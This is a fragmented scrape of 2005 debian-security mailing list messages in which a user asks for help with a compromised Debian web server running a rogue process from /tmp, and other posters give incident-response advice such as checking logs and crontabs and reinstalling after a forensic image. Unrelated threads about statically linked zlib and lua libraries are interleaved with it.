Hi!
I think one of my servers has been compromised. Since i don't have a lot
of experiencei with these things, i beg you for your help.
Information i have gathered together till now are the following. Server
is runnin latest debian stable, sarge.
There was heavy traffic on the server and
Hi!
I think one of my servers has been compromised. Since i don't have a lot
of experiencei with these things, i beg you for your help.
Information i have gathered together till now are the following. Server
is runnin latest debian stable, sarge.
There was heavy traffic on the server and
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
I think one of my servers has been compromised. Since i don't have a lot
of experiencei with these things, i beg you for your help.
Information i have gathered together till now are the following. Server
is runnin latest debian
Christoph Haas wrote:
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
It should be rather easy finding signs of weird accesses like %20 or
chr(). Also look for weird signs in /tmp.
If your server is important you should consider reinstalling.
I'd urge you to spend the time
On Sun, Jul 10, 2005 at 03:59:43PM +0200, Florian Weimer wrote:
On my system, the following packages contain statically linked copies
of zlib-related code:
I'm still interested in a full list of pacakges staticly linked
to any version of zlib.
We had a few advisories about zlib so far:
DSA-763
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
Since the process runs as www-data some kiddy has abused a web service
on your server to download and run an external software. Look for
suspicious log lines of your web server.
Yes ..
Examples of hacks on our servers:
Hello,
This letter is addressed to the monotone mailing list as well as the
debian maintainer of the lua shared library in Debian and the
debian-security mailing list.
Background:
Monotone is currently linked statically against it's own copy of the
lua library. The monotone authors motivation
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data 6059 0.0 0.1 1616 600 ?S17:31 0:00
/tmp/dlciiqlno x
that means, that the process was started at 17:31 today. So i checked
logs (all virtual
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote:
that means, that the process was started at 17:31 today. So i checked
I killed the process and webserver and at 19:31 the process again
started with the same lines in syslog.
Check your crontabs (in various locations) and atq. It
i checked crontabs and i haven't found anything. but new processess started
www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00
/tmp/dlciiqlno x
www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh]
defunct
www-data 6770 0.0 0.1 1624 608 ?S22:10
Reinstall seems the option left...with the added security features discussed
previously, monitoring the server closely after new installation. I would
do the new installation in a new hard disk, saving and afterwards,
installing the seemingly compromised hard disk, for a forensic analysis in
a
In article [EMAIL PROTECTED] you wrote:
I still haven't managed to find out how exactly this happened. And
probably reinstall will be needed? What do you think?
Yes, reinstall on compromised hosts is always needed, however you should
make a image of the system for forensic, you dont want to
Le 12989ième jour après Epoch,
Nejc Novak écrivait:
i checked crontabs and i haven't found anything. but new processess started
www-data 6705 0.0 0.1 1616 600 ?S21:31 0:00
/tmp/dlciiqlno x
www-data 6762 0.0 0.0 00 ?Z22:10 0:00 [sh]
defunct
13 matches
Mail list logo